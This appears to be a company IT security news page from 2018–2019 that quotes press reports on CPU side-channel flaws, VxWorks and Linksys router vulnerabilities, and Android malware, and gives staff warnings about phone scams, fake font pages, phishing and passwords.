SWAPGS attack allows the kernel memory to be leaked
8/8/19: "Security researchers have found a new way to abuse the speculative execution mechanism of modern CPUs to break security boundaries and leak the contents of kernel memory. The new technique abuses a system instruction called SWAPGS and can bypass mitigations put in place for previous speculative execution vulnerabilities like Spectre."
"SWAPGS allows the kernel to gain access to internal, per-CPU data structures, when a process transitions from user-mode to kernel mode. However, researchers from Bitdefender found that the instruction’s behavior when executed speculatively is poorly documented and has security implications."
"Windows most vulnerable to SWAPGS vulnerability" - “A quick analysis of the Linux kernel revealed that although it contains a gadget which may be used in an attack, it lies inside the Non-Maskable Interrupt (NMI) handler,” Bitdefender [white paper] researchers said in their paper. “We therefore believe that Linux would be difficult (if not impossible) to attack.”
[Source: CSO Online]
Researchers have found 11 serious vulnerabilities in VxWorks, the real-time operating system that powers over 2 billion devices
7/29/19: "While VxWorks is used in over 2 billion devices, Wind River said in an emailed press release that these vulnerabilities only impact "a small subset" of its customer base, primarily "enterprise devices located at the perimeter of organizational networks that are internet-facing such as modems, routers, and printers, as well as some industrial and medical devices." However, Armis estimates the flaws expose over 200 million "mission-critical" devices. Researchers at Armis dubbed these flaws as URGENT/11."
"Not all of the vulnerabilities exist in all VxWorks versions, but most versions are affected by at least one of them. The remote code execution flaws can be exploited by simply sending maliciously crafted TCP packets to a vulnerable device, without any additional changes needed to their default configurations."
"According to Armis [IoT security firm], vulnerable devices include industrial SCADA systems, elevator and industrial controllers, patient monitors and MRI machines, firewalls, routers, satellite modems, VOIP phones, printers and more. Prior to 2006, when Wind River acquired the vulnerable TCP/IP stack called IPnet, the stack was also licensed and distributed to other real-time operating system (RTOS) vendors, so there is a high possibility that devices running other real-time operating systems are also vulnerable."
[Source: CSO Online]
Over 25,000 Linksys Smart Wi-Fi routers vulnerable to sensitive information disclosure flaw
Read the full report here.
5/18/19: If you own a Linksys router listed below, we strongly urge you to replace it with any other router (except those made by Cisco) so that your network is safe.
'Zombieload' - Affects Intel CPU's
5/15/19: "...academics say that all Intel CPUs released since 2011 are most likely vulnerable." If you use AMD or any other CPU, you are not affected and can stop reading this article.
Academics have discovered a new class of vulnerabilities in Intel processors that can allow attackers to retrieve data being processed inside a CPU.
The leading attack in this new vulnerability class is a security flaw named Zombieload, which is another side-channel attack in the same category as Meltdown, Spectre, and Foreshadow.
'Zombieload' is what researchers have named a Microarchitectural Data Sampling (MDS) attack, and targets a CPU's microarchitectural data structures, such as the load, store, and line fill buffers, which the CPU uses for fast reads/writes of data being processed inside the CPU. These are smaller-sized caches that are used alongside the main CPU cache.
Microsoft, Apple, and the Linux project are expected to have operating system updates roll out later today, or in the coming days." [Source: ZDnet]
No More Ransom Portal
download & run this vaccination batch file for Petya & NotPetya
WannaDecrypt0r for [Windows XP, Windows 8, and Windows Server 2003]
WannaDecrypt0r [security bulletin MS17-010] for Windows Vista, Windows 7, Windows 8.1, Windows 10, Windows Server 2008, Windows Server 2012, and Windows Server 2016.
3/26/19: "To help owners of Android devices to distinguish between genuine, effective Android antivirus apps on the one hand, and dubious/ineffective ones on the other, AV-Comparatives have again tested the effectiveness of antimalware programs for Android, in the 2019 Android Test. For this test, we searched for and downloaded 250 antimalware security apps by various different developers from the Google Play Store. 80 apps detected over 30% of malicious apps, and had zero false alarms." [The list can be found here.]
"The anti-malware apps from the following 138 vendors detected less than 30% of the Android malware samples, or had a relatively high false alarm rate on popular clean files from the Google Play Store (please note that some company names are quite generic): 1Machine System Sdn Bhd, actionappsgamesstudio, Amantechnoapps, AMIGOS KEY, Amnpardaz Soft, AndroHelm Security, ANTI VIRUS Security, Antivirus Mobile Lab, antivirus security, appflozen, appsshow, Appzila, Arcane Apps, AS team security phone Lab, asuizksidev, Ayogames, AZ Super Tools, azemoji studio, Baboon Antivirus, bESapp, Best Battery Apps, Best HD Wallpapers APPS, Best Tools Pro, BestOne, Bit Inception, BKAV, Bom Bom, Booster studio Laboratory Inc., brouno, Bulletproof AV, Caltonfuny Antivirus Phone, Cheetah Mobile, CHOMAR, Chromia, Cloud 7 Services, Core Antivirus Lab, CPCORP TEAM, Photo blur & photo blender, CreativeStudioApps, CY Security, Defenx, DefineSoft, DreamBig Studios, DU Master, electro dev, Erus IT Private Limited, Falcon Security Lab, Fast n Clean, fluer-apps.com, Formation App, Free Apps Drive, FrouZa, Galaxy TEAM, GameXpZeroo, GlobalsApps, gndnSoftware, GOMO Apps, GoNext App Developers, Gridinsoft, LLC, handy tools apps, Hello Security, Immune Smart, INCA Internet, infiniteWays007, Islamic Basic Education, Itus Mobile Security, JESKO, jixic, Kolony Cleaner, Koodous Mobile, lempea, LINE, LIONMOBI, Live multi Player Game, Main Source 365 Tech, Mama Studio, MAN Studio, Marsolis Tech, Max Antivirus Lab, Max Mobi Secure, MaxVV, Mob Utilities, Mobile Tools Plus, Mobtari, Mond Corey, M-Secure, MSolutions, MSYSOFT APPS, My Android Antivirus, NCN-NetConsulting, Nepelion Camp, Nisi Jsc, Niulaty, NP Mobile Security, NPC Studios, Omha, Oxic Studio, Pix2Pic Studio, playyourapp, Pro Tool Apps, prote apps, Protector & Security for Mobile, Puce, Radial Apps 2018, RedBeard, Secure Cloud, SecureBrain2, Security and Antivirus for Android solutions, Security Apps Team, Security Defend, SECURITY LAB, Security Systems Lab, SecurityApplock, Sept Max, ShieldApps, SjaellSoft, SkyMobileTeam, Smart Battery Solution & Creative Screen Lock, smarteazyapps, Software Center, Soft War, stmdefender, Systweak Software, TAIGA SYSTEM, Tokyo Tokyo, Tools dev, tools for android, Utilitarian Tools, Vainfotech, VHSTUDIO, Vikrant Waghmode, Virinchi Software, Virtues Media & Application, VSAR, Wingle Apps, Xtechnoz Apps, XZ Game, Z Team Pro."
MARCHER TROJAN MALWARE ON ANDROID
Super Mario Run, a mobile game by Nintendo, is currently only available to Apple iOS users - Android users must wait for their version yet third-party web sites already claim this app is available - Do Not Download It - This fake app is actually the "Marcher" Trojan Malware.
Only get your apps for Android from the Goggle Play Store, ignore web sites that claim anything else.
The Marcher app, when you install it, requires you to give administrative access, which means whomever is behind Marcher may monitor the device and steal login data of not just banking and payment apps, but also for apps including Facebook, WhatsApp, Skype, Gmail, the Google Play store, and more. Criminals can exploit all of these stolen details to carry out additional fraud.
[Read more about it here.]
SSA PHONE SCAM
12/31/18: Be on the lookout for phone scammers pretending to be from the United States Social Security Administration.. The S.S.A said that more than 35,000 people reported the scam in 2018, compared to just over 3,000 in 2017.
The scammers will often say your Social Security number is about to be suspended because of suspicious activity.
Your Social Security number will never be suspended and you do not have to verify your number to anyone who calls. The Social Security Administration will never call to threaten your benefits or tell you to wire money or send cash.
3 More Flaws Found in Intel CPU's
8/14/18: "Today, Intel and our industry partners are sharing more details and mitigation information about a recently identified speculative execution side-channel method called L1 Terminal Fault (L1TF). This method affects select microprocessor products supporting Intel® Software Guard Extensions (Intel® SGX) and was first reported to us by researchers at KU Leuven University*, Technion – Israel Institute of Technology*, University of Michigan*, University of Adelaide* and Data61*1. Further research by our security team identified two related applications of L1TF with the potential to impact other microprocessors, operating systems and virtualization software." Read More Details Here.
AMD Ryzen & Epyc Processors Affected with Security Vulnerabilities
3/13/18: "A newly discovered set of vulnerabilities in AMD chips is making waves not because of the scale of the flaws, but rather the rushed, market-ready way in which they were disclosed by the researchers. When was the last time a bug had its own professionally shot video and PR rep, yet the company affected was only alerted 24 hours ahead of time? The flaws may be real, but the precedent set here is an unsavory one." [TechCrunch]
AMD's response: " We have just received a report from a company called CTS Labs claiming there are potential security vulnerabilities related to certain of our processors. We are actively investigating and analyzing its findings. This company was previously unknown to AMD and we find it unusual for a security firm to publish its research to the press without providing a reasonable amount of time for the company to investigate and address its findings. At AMD, security is a top priority and we are continually working to ensure the safety of our users as potential new risks arise. We will update this blog as news develops." [AMD]
Meltdown & Spectre
1/29/18: Microsoft issued an out-of-band update on the weekend that disables Intel's mitigation for CVE-2017-5715, or the Variant 2 Spectre attack described as a "branch target injection vulnerability". This update disables Intel's patch and is available for Windows 7 SP1, Windows 8.1, and all versions of Windows 10, for client and server. Not only was Intel's fix for the Spectre attack causing reboots and stability issues, but Microsoft also found it resulted in the worse scenario of data loss or corruption in some circumstances. [Source: ZDnet]
Intel Flaw Patches
1/24/18: Major PC Manufacturers [Dell, HP, or Lenovo] that released patches for their Intel-powered PC's, ".. chances are very good that the BIOS or UEFI firmware update you installed earlier this month is bad. If you flashed your BIOS or UEFI this month, you’ll almost undoubtedly have to flash it again just to get rid of the buggy code. Then you’ll have to upgrade the firmware once again, at a later time." [source: Computerworld]
1/23/18: Intel executive vice president Neil Shenoy said on Monday that the chip-maker has identified the source of some of the recent problems, so it is now recommended that users skip the available patches. "We recommend that OEMs, cloud service providers, system manufacturers, software vendors and end users stop deployment of current versions, as they may introduce higher than expected reboots and other unpredictable system behavior." Source: Intel
1/6/18: Kicking off 2018 with a bang, we get notice from a lot of sources that there are two new ways to exploit PCs running specific CPU types. The largest problem is "Meltdown" which affects INTEL CPU's yet Microsoft appears to be issuing a patch that fixes all CPU's of both exploits, and AMD CPU's are not affected by Meltdown so those systems will slow down. Thanks Microsoft!
Updating list of Patches.
Spectre and Meltdown explained
CHROME FAKE FONT SCAM
If you have ever been on a web page and seen strange characters in the text, usually it means the author is using a different text encoding - An example is that Agrisea uses Western - Look in your web browser (Text Encoding is under View in Firefox). However, NeoSmart Technologies (an Agrisea technology partner) shows examples of the latest scam affecting the Chrome web browser:
Random characters on a grayed out web page with a white box showing the Chrome Logo and a font missing warning - Except it is all a scam - Do not download anything & close that page. An example:
According to Microsoft Malware Protection Center, a new wave of spam emails carries .LNK files inside ZIP archives. Those files had malicious PowerShell scripts attached to them. "You may think that you are protected from fileless malware because your PowerShell execution policies are set to 'Restricted' so that scripts can't run," the Intel Security researchers said in a blog post. "However, attackers can easily bypass these policies."
HACKING, SPIES, & CYBERCRIMINALS
1) First thing you must know, keeping your accounts safe must be your top priority so if you get an email asking you for your login or password, delete it - No one you already do business with is going to ask you for that information. And if it is someone in your company wanting to know, walk over and ask them why they want it - They might be infected and not even know it.
2) If an email sounds like it is from one of your friends but seems to be slightly off, call them on your phone to ask, and don't click on links in that email. The email might be a phishing attempt by a spy and not the James Bond type either.
3) Seriously, change your password often (that means more than once a year) and don't use the same password for every place.
4) H.R. departments are coming under attack by fake job applications that arrive in email, usually with a PDF file attachment (like a cover letter) and also have a Microsoft Office something. When whatever it is, Excel, Word, etc. is opened, it says Macros must be enabled and if you do, Ransomware encrypts your computer... See Article 2 below for more.
The "bad guys" out there in cyberspace want to steal whatever they can get from you and where you work. And if they can get a virtual foot in the door on something you use, like your phone, it opens up your whole world that they can then exploit. Which means it will cost you, maybe money or identity theft or maybe something even worse.
SO, Next time Agrisea tells you to change your password, don't make a face, we are trying to keep you safer in an increasingly hostile world.
Read more about what is happening in these articles on ZDnet: 1 & 2.
Still running Windows 7 or 8.x? You should use a small piece of software [download it] to prevent Windows 10 pieces from being installed to your computer.